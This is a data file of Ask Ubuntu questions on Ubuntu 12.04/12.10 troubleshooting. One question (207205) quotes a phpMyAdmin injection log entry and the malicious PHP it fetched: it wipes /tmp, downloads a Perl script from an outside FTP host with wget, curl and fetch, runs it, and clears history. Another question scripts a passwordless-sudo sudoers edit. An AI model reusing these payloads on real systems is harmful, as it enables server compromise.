207067	`` too many arguments '' checking a condition and execute some action in case it 's not true ?	i have edited my sudoers file to allow my non-root user to run sudo commands without being prompted for a password . in vim , how do i create a function that checks whether this condition is true , if not , prompt the user if they want the script to edit and save the sudoers file to make this condition true ? if condition is true , carry-on with rest of script . if condition is not true , the script silently edits/adds the line : % sudo all= ( all : all ) nopasswd : all in the sudoers file , saves and then continues on with the next part of the script . so i 've started writing the function using the code : ... # lines 1-5 passchk ( ) { passput= '' % sudo all= ( all : all ) nopasswd : all '' ; passrd=sudo grep -is `` $ passput '' -- file=/etc/sudoers ; if [ $ passrd == $ passput ] ; then # if sudoers already contains line from $ passput , # exit passchk and proceed to pkgfetch . pgkfetch ; else echo `` you will be prompted for user password . do you want to temporarily disable this ? `` ; read answer ; fi if [ $ answer ! = '' y '' ] || [ $ answer ! = '' n '' ] ; then null elif [ $ answer = '' y '' ] ; then $ passput|tee -a > /etc/sudoers elif [ $ answer = '' n '' ] ; then pkgfetch ; fi ; clear ; } ; passchk ; i am recieving an error on line 9 if [ $ passrd = $ passput ] ; then pkgfetch ; [ : too many arguements . i do n't get it . i 'm trying to test if directory in $ passrd contains string from $ passput . what am i doing wrong ?
207070	restore default gnome ubuntu 12.04	i have installed ubuntu 12.04 and added the classic gnome so it would look like ubuntu 10.04 ( i liked that classic look better ) . today i accidentally deleted everything from the panel . since i am quite new to ubuntu i now ca n't get it back as it was . can anyone tell me how to get it back to look like as it was before ?
207073	lyric player just like miniyrics in ubuntu 12.10 with highlighted scrolling lyrics	i have been adjusting to ubuntu 12.10 and it seems to be no trouble so far ( except a few glitches ) . i have been searching for a lyrics player like minilyrics . it serves as an add-on to winamp . but i cant find one just like it : - ( i have tried clementine & rhythmbox , but they do n't satisfy those needs . amrok has scrolling lyrics , but it does n't have highlighted lyrics and is sometimes out of sync . these are the things are that i believe that give windows & mac the upper hand ... ... ..
207075	gimp wo n't open psd file : 'no such file or directory '	trying to open a psd file in gimp , i get this message : opening '/home/neils/downloads/file.psd ' failed : error loading psd file : no such file or directory the terminal output reads : ( gimp:2785 ) : glib-warning ** : ( /build/buildd/glib2.0-2.32.3/./glib/gerror.c:390 ) : g_error_new_valist : runtime check failed : ( domain ! = 0 ) actually i can open psd files on gimp before . anybody faced this before ? i would be thankful for any tips . this for gimp version 2.6.12 and ubuntu 12.04.1 lts .
207080	where to re-build kernel from in http : //kernel.ubuntu.com/~kernel-ppa/mainline/ ?	because i experiment with btrfs in my 12.04 server , i use recent 3.6.3-030603-generic kernel found in the kernel-ppa/mainline - kernel ubuntu ( intended for 12.10 quantal ) . i also use the lxc , which works better when the kernel is compiled with config_memcg and config_memcg_swap flags compiled ( which are absent in the mentioned kernel ) . i 'd like to try to recompile the kernel with those flags in the way as ubuntu-compatible as possible . how to do it ? how to get the sources from 12.04 ( or should i install 12.10 just for this process ? ) ( all the tutorials i found on the net eighter assume i use the newest kernel , or some specific version ( different from mine ) or that the kernel source is taken from apt-source )
207081	usb data transfer from windows to linux	i am trying to transfer data between linux and windows machines using usb ( using amkette flash link ) cable . previously i used network protocol ( udp ) to transfer data between linux and windows . but now i need to use usb cable to transfer data , is this possible ? if possible which cable we need to use ? is there any libraries for usb data transfer or samples ?
207082	how to make the apt autocompletion work in minimal system ( in lxc container ) ?	when i work inside thin lxc container on 12.04 i have only very basic system . in particular the /etc/bash_completion.d is missing the e.g . apt , that i find particularly useful . is there any standard package , that installs the autocompletion for the apt , or should i copy the file manually ? and just copying the files into /etc/bash_completion.d manually just does n't seem to work . i use bash as my command interpreter . what am i missing here ?
207086	how to install trimaran on 12.10 ?	i am not able to install the trimaran package on ubuntu 12.10 . i have tried this how-to guide . can someone help me find the solution to this problem ?
207091	usb and cd data can not be read or mounted in 12.10	i 'm using ubuntu 12.10 . i wrote a data disk using brasero disk burner , but the system can not read the cd . i tried to write the same data into my hp v220w pen drive but now there is an error in that too . it shows the following : error mounting /dev/sdb at /media/aravind4j/aravind4j : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb '' `` /media/aravind4j/aravind4j '' ' exited with non-zero exit status 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details . ( udisks-error-quark , 0 ) i used a ntfs file system for the pen drive as you can recognize from the above statement . i would like to recover the files so please help me recover the files without formatting the drive .
207092	how to edit startup applications in 12.10 ?	in ubuntu 12.10 i ca n't find the app for editing the list of applications anymore ? where has it gone and how can i reinstall it ? i do n't even find a fitting entry in synaptic .
207094	re-order active applications in right navigation bar	i am using ubuntu 12.04 and i want to know is there a way to re-order the item in my navigation bar . in windows 7 it is possible to group elements and re-order their position . to be more specific . when i new application is started , it is added in my right navigation bar ( or bottom menu for windows ) . is there a way ti drag the `` chrome '' icon for example , and to move it below to firefox one ? now , if i try to drag a icon , the all icons move .
207095	is it possible to delete the main device from firefox sync after reinstalling the os ?	i recovered my data after a reinstall . but sync still stores the data from the device that `` does n't exist '' anymore . i ca n't find an option to delete devices like in ubuntu one .
207097	onboard hdmi audio stops working when tv turned off	i have a gigabyte ud5h motherboard ( intel z77 chipset ) with onboard hdmi and an intel i5 3750k cpu . i 'm running ubuntu 12.10 64 bit . i do not have a dedicated graphics card . i have connected the pc to the tv over hdmi . the graphics seems to work fine ( presumably the hd4000 integrated graphics are doing their thing correctly ) . the problem i 'm having is that on first boot , audio works ok over hdmi . if i turn the tv off but leave the pc on , audio no longer is available over hdmi . the graphics continue to work though . if i go to sound settings , hdmi does n't even show up as an available audio output ( like it would on first boot ) . i 've tried killing and restarting pulseaudio but that does n't work . rebooting solves the issue but since the pc is a htpc i ca n't keep rebooting it every time the tv is turned off ! is there a way to fix this ? do i need any special drivers ?
207102	running cron job on ubuntu server for sugarcrm	i am pretty inexperienced in linux , so be descriptive on your answer . my environment : local linux server 12.04 hosting sugar crm 6.5.2 . there is area in sugar crm called scheduler . i can configured some predefined jobs here . in my case i am trying to run email reminders ( ever min/hour/day/month ) . for this scheduler to be effective , i read some where i need to setup cron job . so i did some research & finally put following lines in crontab for the root user , as per instructions given in sugarcrm . * * * * * cd /var/www/crm ; php -f cron.php > /dev/null 2 > & 1 well i am creating contracts in my sugarcrm ( aos module ) & i want email reminders to be sent for these contracts to the concern person . now my sugarcrm email is configured correctly & i can send test emails using it . but the cron + scheduler not giving any result . i ca n't receive any emails . then i tried to read /var/log/syslog & it is showing entry for following line each minute . oct 27 15:03:01 unicomm cron [ 28182 ] : ( root ) cmd ( cd /var/www/crm ; php -f cron.php > /dev/null 2 > & 1 ) i 've few questions : what does the cron job line i 've added in crontab mean ? cd /var/www/crm ; php -f cron.php > /dev/null 2 > & 1 is not making any sense to me . how am i suppose to get this thing work ? i 've searched a lot ( including sugarcrm forum ) , but no luck .
207105	windows vista shows iso file as zip !	when i download the iso file , my system shows the file as a zip file and not as an iso . i have tried to burn the file as an image to a dvd but my laptop will not bootup from the cd . setting in the bios are ok . so i guess the problem is with the iso file or the way i burned the cd . i have follwed the instructions on the site for downloading and burning an iso image to cd . and i guess that my problem is with the file association in windows vista . any ideas and suggestions are welcome thanks
207107	problems with youtube on a new ubuntu 12.10	i 've updated my ubuntu to 12.10 . soon after that i 've started having troubles with youtube : video stops in ~1 minute before the end . does anyone knows how to resolve that issue ? update : also , this issue appears only if i watch video in a fullscreen mode .
207111	how to install codecs offline	i have installed ubuntu 12.04 version earlier , but when i wants to play mp3 , mp3 or any kind of media , an messages shows that you have not installed codec , decoder for these type of file .
207120	where is error log in looking glass in gnome shell 3.6 ?	where is error log ( `` errors '' tab ) in looking glass in gnome shell 3.6 ( ubuntu 12.10 ) ?
207126	creating ubuntu bootable disk in windows using my phone	i want to install ubuntu 12.04 on my laptop but because i have a complete shortage of writable cds and dvds , i wa n't to create a bootable usb stick ( on windows ) . however , the only usb stick i currently have lying around is my htc phone ( htc touch hd with 8gb memory ) . i was following the ubuntu guide to create a bootable usb stick with pendrivelinux , however in the last step it shows me that it wants to do more than just copying the .iso file to the usb drive : my question : can i safely proceed without wiping the current os off my phone ( windows mobile 6.1 ) and use it to install ubuntu ?
207128	how to create dm-crypt device in lxc ?	on one lxc container i need to put sensitive data , preferrably stored in dm-crypt encrypted filesystem . when i write sudo cryptsetup luksformat -- cipher aes-xts-plain -- size 512 $ mydocscryptdir/ $ mydocscryptfile , after the confirmation dialog i 've got the error : can not find a free loopback device . the lxc is installed on ubuntu 12.04 with 3.6.3 kernel from kernel-ppa/mainline - kernel ubuntu container config : lxc.network.type=veth lxc.network.link=lxcbr0 lxc.network.flags=up lxc.network.hwaddr= 00:16:3e:10:97:12 lxc.network.ipv4 = 10.0.3.11/24 lxc.devttydir = lxc lxc.tty = 4 lxc.pts = 1024 lxc.arch = amd64 lxc.cap.drop = sys_module mac_admin lxc.cgroup.devices.deny = a # allow any mknod ( but not using the node ) lxc.cgroup.devices.allow = c * : * m lxc.cgroup.devices.allow = b * : * m # /dev/null and zero lxc.cgroup.devices.allow = c 1:3 rwm lxc.cgroup.devices.allow = c 1:5 rwm # consoles lxc.cgroup.devices.allow = c 5:1 rwm lxc.cgroup.devices.allow = c 5:0 rwm # lxc.cgroup.devices.allow = c 4:0 rwm # lxc.cgroup.devices.allow = c 4:1 rwm # /dev/ { , u } random lxc.cgroup.devices.allow = c 1:9 rwm lxc.cgroup.devices.allow = c 1:8 rwm lxc.cgroup.devices.allow = c 136 : * rwm lxc.cgroup.devices.allow = c 5:2 rwm # rtc lxc.cgroup.devices.allow = c 254:0 rwm # fuse lxc.cgroup.devices.allow = c 10:229 rwm # tun lxc.cgroup.devices.allow = c 10:200 rwm # full lxc.cgroup.devices.allow = c 1:7 rwm # hpet lxc.cgroup.devices.allow = c 10:228 rwm # kvm lxc.cgroup.devices.allow = c 10:232 rwm lxc.utsname = statystyka lxc.mount = /var/lib/lxc/statystyka/fstab lxc.rootfs = /var/lib/lxc/statystyka/rootfs
207129	multiple languages in hud and dash	is it possible to have multi-language support for hud and dash ? for example , on the dash i would like to be able to search for `` files '' ( english ) and `` dateien '' ( german ) or on the hud search for `` open '' ( english ) and `` รถffnen '' ( german ) and receive the same result .
207130	ethernet card not detected on ubuntu server 12.04	my onboard ethernet is n't detected after a re-install of server 12.04 . for reasons i wo n't get into here , i had to put the server 's drive into another machine to install ubuntu , then swap back into the server . so the server starts up fine , except for the `` waiting for network configuration '' . i read in another article that server , by default , does n't handle new mac addresses for hardware changes dynamically , unlike ubuntu desktop , but a look at /etc/udev/rules.d/70-persistent-net.rules shows only one ethernet interface . should n't it show both the old , and the new ? lspci -vv shows an ethernet interface , so what the heck is going on ? i should mention that the onboard lan is enabled in the bios . and i know this is n't important , but all this started when i changed some network configuration settings in webmin before the re-install . it could n't download any updates , so i tinkered a little . broke , it , installed freenas , which worked , but i did n't like it , then went back to ubuntu server , and now i 'm in this pickle . thanks for any advice !
207131	screensaver/blanking problem	i have upgraded to 12.10 and then downgraded again to 12.04 lts because of the screensaver or screen blanking problem . after 10-12 minutes the screen goes black/blank when i dont do anything ( idle ) . i have tried setting in the brightness and lock menu that the screen should never lock or turn off if idle . this is very annoying when watching movies etc . would be nice if someone knows this .
207138	login screen hesitates and login issues with another user after 12.10 upgrade	i installed 12.10 last evening , no issues during install and rebooted ok , however from there have had problems : when login appears for the main account i use , i enter password and screen hesitates , flashes some error i can not catch and goes immediately back to login screen . login via another user can get in but no disks are mounted and will not allow me to mount any .
207141	i am new to ubuntu 12.10	i am new to ubuntu and i dont know how to install the drivers and the necessary utilities for it . hence can any one please let me know what to and how to install the required utilities after installing ubuntu 12.10 thanks in advance
207143	how to diagnose upstart errors ?	i have an upstart conf file in /etc/init which starts fine if i start it manually like this : sudo initctl start myconf if i run it without the sudo command i get the error name= ( unset ) error , which is due to user privileges , but that should n't be the problem when the job is initialised at system boot when upstart kicks in right ? ( because thats all run by the root ) . the content of the script is : start on runlevel [ 2345 ] stop on runlevel [ ^2345 ] exec /spatial/server_init.sh ... where the server_init.sh runs a python script based server . when i check the status of the script right after i login to shell , it says stop/waiting . i also tried the conf file with `` start on net-device-up '' but nothing changes . is there a way to see the upstart system log or something similar that might help me debug the problem . thanks
207144	ca n't edit with gksudo ( duplicate entry in source.list )	i 'm trying to follow this tutorial . and i have followed all the previous tutorials on this site to get where i am now . however now when i tried to install virtualbox i get some errors . first and i ended up adding virtual box sources twice . how do i remove these duplicate entries ? ( gksudo does not work . cant edit the file ) when i try to run : sudo apt-get install dkms virtualbox-4.0 i get this error : some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : virtualbox-4.0 : depends : libpython2.6 ( > = 2.6 ) but it is not installable recommends : libsdl-ttf2.0-0 but it is not going to be installed recommends : libhal1 ( > = 0.5 ) but it is not going to be installed recommends : pdf-viewer recommends : python-central but it is not going to be installed e : unable to correct problems , you have held broken packages . what can i do to fix this ?
207147	gcc 4.8 installation ?	what is the best way to install gcc 4.8 in quantal quetzal ( 12.10 ) ? i am trying to explore it 's improved diagnostic messages and compare them to clang , so 4.7 will not do . gcc-snapshot from the repository , ppa , or compile from source ? also will it coexist peacefully with an install of gcc 4.7 on the same machine ?
207148	restricting access to ip using .htaccess is not working	when i say 'not working ' i do n't mean it 's broken . i mean i ca n't get it to work so i must be doing something wrong . ( i am new to this ) i have the following code in a htaccess file placed in the folder i want to restrict access to ... < limit get > order deny , allow deny from all allow from [ the ip address i 'm trying to allow ] < /limit > i have checked that the accessfilename directive is set in apache2.conf i reboot the server after each edit of the file . the file is set with 644 permissions . and i am still able to access the site from ips other than the one i 'm allowing . what am i doing wrong ?
207150	how do i get rid of the `` the software on this computer is up to date '' message after updates ?	i 'm a bit annoyed by the update manager . since i upgraded from 12.04 i get this message , after installing updates : i find it utterly useless . it just another thing that pops in my face . if an update failed i get an error message regardless . its interface 101 that you do n't need a message when everything went well . how do i get rid of it or file a complaint so that it will not be included in future versions ? i know this is a minor thing and really not worth my time but for some reason it really annoys me . update : launchpad bug
207151	set default page zoom level in epiphany web browser	i have a small screen with my laptop . in firefox , i change the default page zoom level using the nosquint extension , but i 'm a gnome user and i would prefer using epiphany ( web ) ... is it possible to set a default page zoom level in epiphany browser ( web ) ? i use epiphany ( web ) 3.6 on ubuntu gnome remix 12.10 . thanks , răšmi .
207152	how to add icq account to empathy ?	i am new to linux and i just installed ubuntu 12.10 with gnome 3.6 . now i am trying to setup my accounts . i have a problem because i want to use icq with the in gnome integrated im system , i.e . message popup automatically and you can answer them from the bottomt status bar . so how can i add icq support to the system ? i already installed `` telepathy-haze '' from the ubuntu software but there is no icq option in the settings- > accounts window . also , there are two account ( german language : `` online-konten '' ) in the system- > personal window . did i install gnome wrong ? or is that normal ? i really like the look and feel of ubuntu + gnome3.6 but right now i feel that it is not working they way it is supposed to . any help ?
207159	gnome shell menu does n't load on startup in ubuntu 12.04	i use ubuntu 12.04 . i recently tried to install gnome-shell-extensions-commons . after that i powered down my laptop . now when i try to login to gnome-shell the menu and top panel do not show . i am not sure whether gnome-shell-extensions-commons is the one responsible for this . update : i tried to purge and re-install gnome-shell but still no change . gnome-shell just does n't load up . also did autoremove before installing .
207164	how do i share a connection from an iphone to ubuntu ?	i would like to share my 3g connection from my iphone with my computer . i made it worked using usb on ubuntu 12.04 but since i updated to 12.10 ( my bad ) now it says : `` device not managed '' . i tried a lots of things , pdanet and so on but when my computer connect to the mobile i am unable to browse the net even if the connection is on . it seems like an @ or routing issue and i ca n't fix it by myself . if you have any solution , please help me !
207166	using software updates , updates fail each time	using software updates , updates fail each time , also seems to find a different update each time i use app ... . last evening `` successfully '' inatalled 12.10 upgrade ... preparing to replace libdrm2 : amd64 2.4.39-0ubuntu1 ( using ... /libdrm2_2.4.39 0ubuntu1_amd64.deb ) ... unpacking replacement libdrm2 : amd64 ... dpkg : error processing /var/cache/apt/archives/libdrm2_2.4.39-0ubuntu1_amd64.deb ( -- unpack ) : trying to overwrite shared '/usr/share/doc/libdrm2/changelog.debian.gz ' , which is different from other instances of package libdrm2 : amd64 errors were encountered while processing : /var/cache/apt/archives/libdrm2_2.4.39-0ubuntu1_amd64.deb
207168	ubuntu 12.10 hide/show top panel shortcut	is there any way to set show/hide top panel shortcut on ubuntu 12.10 ? especially i want it to show chromium across the whole screen . i found that there is no possibility how to view fullscreen with tabs in chromium therefore i am trying to hide this panel temporary on ubuntu .
207172	how to convert cbr to pdf ?	i have a comic strip book in cbr ( calibre ? ) format . how can i convert it to pdf in my ubuntu 12.04 ? i tried to install calibre hoping that it is able to do so . but it seems to be buggy and does not show up . appreciate your hints to do the conversion .
207175	what does `nomodeset` do	since installing ubuntu 12.10 i have been playing around trying to get my radeon hd 5450 gpu to work with the proprietary driver , as from the start installing the driver meant losing unity . i wo n't list the steps i took as it is not a requirement to answering this question . after taking one measure and then installing fglrx-updates , upon reboot the system hung at the purple screen . so i decided to boot using nomodeset i edited quiet splash $ vt_handoff to look like this quiet splash nomodeset making this change i am then able to log in with unity and the proprietary driver installed and performing well . i would go as far as to say it performs better than it did in 12.04 fglrxinfo reads display : :0 screen : 0 opengl vendor string : advanced micro devices , inc. opengl renderer string : ati mobility radeon hd 5000 series opengl version string : 4.2.11903 compatibility profile context please note the way i have added nomodeset it had been a while since i have had to do this so it was done from memory . when looking for an answer to this question i came across this and discovered that my edit was supposed to go from quiet splash $ vt_handoff to nomodeset $ vt_handoff what has my nomodeset edit done ? the only thing wrong that i have noticed is that i do n't get the plymouth ubuntu logo screen when booting . if that is the only trade-off i am happy to make the edit permanant .
207176	how to replace tray icons for applications in cinnamon	i have my cinnamon bar with tray icons ( skype , pidgin , dropbox ) next to cinnamon ones . i 'd like to replace them with my own icons so that they have similar design to those remaining . where should i look for icons for pidgin , skype and dropbox ?
207178	soccer games for linux	are there soccer games such as fifa ( from ea-sports ) for linux . which one are open source , which just free but with closed code and which are commercial ones .
207180	changing permissions in fstab in order to allow writing in windows ntfs partition	i have in my /etc/fstab file this line in order to mount my windows ntfs partition : /dev/sdb1 /media/sdb1 ntfs rw , noauto , users , permissions 0 2 i 've changed the owner using chown and set the permissions to 777 using chmod . if i make an ls -lt it shows the owner and the permissions properly changed . however i still do n't have permissions for writing there , if i execute mkdir test it says : mkdir : can not create directory `test ' : permission denied any suggestions ? update i found the solution , these are the steps i followed : type sudo blkid get the uuid related to your ntfs partition . change the /etc/fstab file adding this line : uuid= '' your uuid '' /media/ '' any name '' ntfs users , defaults 0 0
207182	can not download 12.10	i do not know what might be the cause of this but i ca n't download ubuntu 12.10 from their website , it gets stuck on 761 mb . i disabled avp system and tried to download it with chrome and firefox but still it got stuck on 761mb out of 763mb .
207184	how to restore grub after restoring mbr with boot-repair ?	i 've a problem after upgrading to 12.10 , which is when i choose windows option from boot options , i got `` a disk read error occurred '' error . i followed this tutorial to restore mbr , but the problem now that the grub is gone and it boots directly to windows 7 . what should i do now to restore both windows 7 & ubuntu ?
207190	ubuntu 12.10 install issues	i am trying to install ubuntu 12.10 on a x86 sony vaio ( its 10 years old.. running xp ) and it is not working at all . i burned a livecd , popped it in , it came up to the ubuntu splash screen then came to this : busybox v1.19.3 ( ubuntu 1:1.19.3-7ubuntu ) built-in shell ( ash ) enter 'help ' for a list of built-in commands ( initrams ) unable to find a medium containing a live file system _ after a little research , i tried the cd on a x64 machine to find it works perfectly ( the livecd is the x32 version ) , a laptop about 2 years old . i have tried unplugging unnecessary usb devices , there is no ide > ahci option in bios.. and i know my cd drive should be ok , i 've done livecd 's before . anyone have any ideas ? make enter a special code by pressing shift at the disc startup ? any help here is deeply appreciated !
207191	which version control system to use ?	i am looking at using a version control system to ensure that i can go back in time to a particular version for all documents in ~ , if i have to . what is the best suited tool for this given that : i am without much experience in version control systems several files will be plain text files but there will be some libre-office files also the tool should : be easy to set-up , run and maintain have easy to understand configuration options ( what directories to track , for how long , how frequently the changes should be captured , etc . ) ideally have a gui front also be able to recover deleted files what is the best/ most widely used tool that will be suitable for me ?
207192	ubuntu 12.10.zram-config or zramswap-enabler ? which is better ?	which of this two are better for upstarting the zram ? zram-config is available at software center.the other one is from ppa .
207195	can i use unity with xmonad ?	i 've been using fedora for a while , but i recently decided to upgrade my ubuntu installation from 12.04 to 12.10 . while i was using fedora , i found xmonad tiling window manager which i sort of got working with xfce . i really like xmonad and i now automatically use the keyboard shortcuts without even thinking . so i would like to use xmonad with unity . now , i have seen several blog posts etc . that explain how to setup the whole thing in 12.04 , with unity2d . but now , unity2d has been removed , and the old methods no longer apply . i have read that unity is actually just a compiz plugin , and that the wm ca n't be replaced . does no version of unity have a replaceable wm ? i 've also tried mate ( gnome2 fork ) with xmonad on 12.10 and that is totally broken for me , but that 's for another question .
207196	what is the best google calender application for unity to alert and notify you with events ?	i want some example for the best application/client for manage and edit and control your google calendar and daily mission or event . and it provide alert -alert with sound or notification- to give you more attention for your important work ?
207199	browsing redirected and ad playing in background - malware ?	recently i have noticed when browsing a web page will be redirected to something other than what i click on . for instance , when i tried going to www.askubuntu.com via a link on ubuntu.com it redirected me to some other site than this one . also when on a page with no flash videos of any kind or pop up windows an ad will start playing . the only way to get it to stop is to wait for it to finish or close the browser and start over again . i have run clam av but it has not found anything .
207205	suspicious http access log .	please help me ! i realized that the following is logged in my http log file . action=lay_navigation & eoltype=unix & token=a13369792c1a33ec1130500ca821c5a4 & configuration=a % 3a1 % 3a % 7bi % 3a0 % 3bo % 3a10 % 3a % 22pma_config % 22 % 3a1 % 3a % 7bs % 3a6 % 3a % 22source % 22 % 3bs % 3a47 % 3a % 22ftp % 3a % 2f % 2fhawk1156 % 3atunpkpk123 % 40hawkish.co.uk % 2fieh.ico % 22 % 3b % 7d % 7d when i decode it , it becomes action=lay_navigation & eoltype=unix & token=a13369792c1a33ec1130500ca821c5a4 & configuration=a:1 : { i:0 ; o:10 : '' pma_config '' :1 : { s:6 : '' source '' ; s:47 : '' ftp : //hawk1156 : tunpkpk123 @ hawkish.co.uk/ieh.ico '' ; } } i got worried about the suspicious ftp link , and i decided to download it . wget ftp : //hawk1156 : tunpkpk123 @ hawkish.co.uk/ieh.ico the content of the file was like this : < ? system ( `` cd /tmp ; rm -rf * ; wget ftp : //hawk1156 : tunpkpk123 @ hawkish.co.uk/2.txt ; perl 2.txt ; curl -o hawk1156 : //ftp : tunpkpk123 @ hawkish.co.uk/2.txt ; perl 2.txt ; fetch hawk1156 : //ftp : tunpkpk123 @ hawkish.co.uk/2.txt ; perl 2.txt ; rm -rf 2.txt ; history -c ; '' ) ; exit ? > of course , i did never execute it by myself , but i am not sure if my server has already been hacked at this point . what should i do ? i do n't know where to start .
207212	cd command not working anymore	i just did two things : install scm_breeze and mercurial : git clone git : //github.com/ndbroadbent/scm_breeze.git ~/.scm_breeze ~/.scm_breeze/install.sh sudo apt-get install mercurial and now my cd command seems to be gone : dys @ dys-tour : ~/prog > cd ~ bash : /home/dysâ : is a folder dys @ dys-tour : ~/prog > cd .. ..â : command not found the terminals i opened before installing scm_breeze and mercurial are fine . the terminals i open now have the problem . i uninstalled scm_breeze , with no result . what can i do to diagnose the problem and fix it ?
207213	system freezing and boot error .	i installed 12.10 dual boot with windows 7 using wubi . getting system freeze as well as an error upon boot . here is a syslog . i cant make any sense of it , i 'm a bit of a noob .
207214	ubuntu 12.04 driver for lexmark x4650	does anyone have a driver ( or other way to connect to ) a lexmark x4650 wireless network printer ?
207215	redirecting packages when migrating ppas	i have some packages in a ppa and , now , have created a group ppa . is there a way to put in a redirect such that anyone installing package foo from ppa : jrhacker/ppa can be redirected to ppa : initech/ppa but package bar from ppa : jrhacker/ppa is left alone ? i do n't particularly care if the redirect is an error message telling them the correct migration path . as i see it , i have two options : always copy the packages from initech/ppa back to jrhacker/ppa . create a dummy package in jrhacker/ppa that , when it runs , spits out an error message with the installation instructions when the program is invoked . i 'd like something a bit more elegant than either of these two . thanks .
207218	automatically pass command to terminal	is there any possibility to put some lines of code automatically to the terminal ? e.g . when i want to start hamachi through the terminal and do n't want to write long expressions every time . maybe this problem is easy to solve , but i am a beginner and would be thankful for help .
207223	incomplete upgrade 12.04 to 12.10	everything was running smoothly . everything had been downloaded from internet , packages had been installed and a prompt asked for some obsolete programs/files to be removed or kept . after that the computer crashed and and to manually force a shutdown . i turned it on again and surprise i was on 12.10 ! still the upgrade was not finished ! how can i properly finish that upgrade ? here 's the output i got in the command line after following posted instructions : i astrill - astrill vpn client software i dayjournal - simple , minimal , digital journal . i gambas2-gb-form - a gambas native form component i gambas2-gb-gtk - the gambas gtk component i gambas2-gb-gtk-ext - the gambas extended gtk gui component i gambas2-gb-gui - the graphical toolkit selector component i gambas2-gb-qt - the gambas qt gui component i gambas2-gb-settings - gambas utilities class i a gambas2-runtime - the gambas runtime i google-chrome-stable - the web browser from google i google-talkplugin - google talk plugin i indicator-keylock - indicator for lock keys i indicator-ubuntuone - indicator for ubuntu one synchronization s i a language-pack-kde-zh-hans - kde translation updates for language simpl i language-pack-kde-zh-hans-base - kde translations for language simplified c i libapt-inst1.4 - deb package format runtime library ida libattica0.3 - a qt library that implements the open coll ida libbabl-0.0-0 - dynamic , any to any , pixel format conversi ida libboost-filesystem1.46.1 - filesystem operations ( portable paths , ite ida libboost-program-options1.46.1 - program options library for c++ ida libboost-python1.46.1 - boost.python library ida libboost-regex1.46.1 - regular expression library for c++ i libboost-serialization1.46.1 - serialization library for c++ ida libboost-signals1.46.1 - managed signals and slots library for c++ ida libboost-system1.46.1 - operating system ( e.g . diagnostics support ida libboost-thread1.46.1 - portable c++ multi-threading i libcamel-1.2-29 - evolution mime message handling library i libcmis-0.2-0 - cmis protocol client library i libcupsdriver1 - common unix printing system ( tm ) - driver l i libdconf0 - simple configuration storage system - runt i libdvdcss2 - simple foundation for reading dvds - runti i libebackend-1.2-1 - utility library for evolution data servers i libecal-1.2-10 - client library for evolution calendars i libedata-cal-1.2-13 - backend library for evolution calendars i libedataserver-1.2-15 - utility library for evolution data servers i libexiv2-11 - exif/iptc metadata manipulation library i libgdu-gtk0 - gtk+ standard dialog library for libgdu i libgdu0 - gobject based disk utility library ida libgegl-0.0-0 - generic graphics library ida libglew1.5 - the opengl extension wrangler - runtime en i libglew1.6 - opengl extension wrangler - runtime enviro i libglewmx1.6 - opengl extension wrangler - runtime enviro i libgnome-bluetooth8 - gnome bluetooth tools - support library i libgnomekbd7 - gnome library to manage keyboard configura ida libgsoap1 - runtime libraries for gsoap i libgweather-3-0 - gweather shared library i libimobiledevice2 - library for communicating with the iphone i libkdcraw20 - raw picture decoding library i libkexiv2-10 - qt like interface for the libexiv2 library i libkipi8 - library for apps that want to use kipi-plu i libkpathsea5 - tex live : path search library for tex ( run i libmagickcore4 - low-level image manipulation library i libmagickwand4 - image manipulation library i libmarblewidget13 - marble globe widget library ida libmusicbrainz4-3 - library to access the musicbrainz.org data i libnepomukdatamanagement4 - basic nepomuk data manipulation interface i libnux-2.0-0 - visual rendering toolkit for real-time app i libnux-2.0-common - visual rendering toolkit for real-time app i libpoppler19 - pdf rendering library i libqt3-mt - qt gui library ( threaded runtime version ) , i librhythmbox-core5 - support library for the rhythmbox music pl i libusbmuxd1 - usb multiplexor daemon for iphone and ipod i libutouch-evemu1 - kernelinput event device emulation library i libutouch-frame1 - touch frame library i libutouch-geis1 - gesture engine interface support i libutouch-grail1 - gesture recognition and instantiation libr ida libx264-120 - x264 video coding library i libyajl1 - yet another json library i linux-headers-3.2.0-29 - header files related to linux kernel versi i linux-headers-3.2.0-29-generic - linux kernel headers for version 3.2.0 on i linux-image-3.2.0-29-generic - linux kernel image for version 3.2.0 on 64 i mplayerthumbs - video thumbnail generator using mplayer i myunity - unity configurator i a openoffice.org-calc - office productivity suite -- spreadsheet i a openoffice.org-writer - office productivity suite -- word processo i python-brlapi - python bindings for brlapi i python-louis - python bindings for liblouis i rts-bpp-dkms - rts-bpp driver in dkms format . i system76-driver - universal driver for system76 computers . i systemconfigurator - unified configuration api for linux instal i systemimager-client - utilities for creating an image and upgrad i systemimager-common - utilities and libraries common to both the i systemimager-initrd-template-am - systemimager initrd template for amd64 cli i touchpad-indicator - an indicator for the touchpad i ubuntu-tweak - ubuntu tweak i a unity-lens-utilities - unity utilities lens i a unity-scope-calculator - calculator engine i unity-scope-cities - cities engine i unity-scope-rottentomatoes - unity scope rottentomatoes
207226	how to make a simple ubuntu gui application from shell script code ?	i want this shell script convert to a gui ubuntu application any one please help me to make a ubuntu application . this shell script is used to download hindu news paper .
207227	tty1 on video projector	is it somehow possible to display tty1 or similar to a video projector ? xrandr can not open the display : $ xrandr -- query ca n't open display i have a ati graphics card and am not using the proprietary drivers . booting with the projector attached changes nothing . i do n't see output in the bios , in the grub menu as well as when booting ubuntu ( graphical as well as text based ) . i get an image when the login screen shows up .
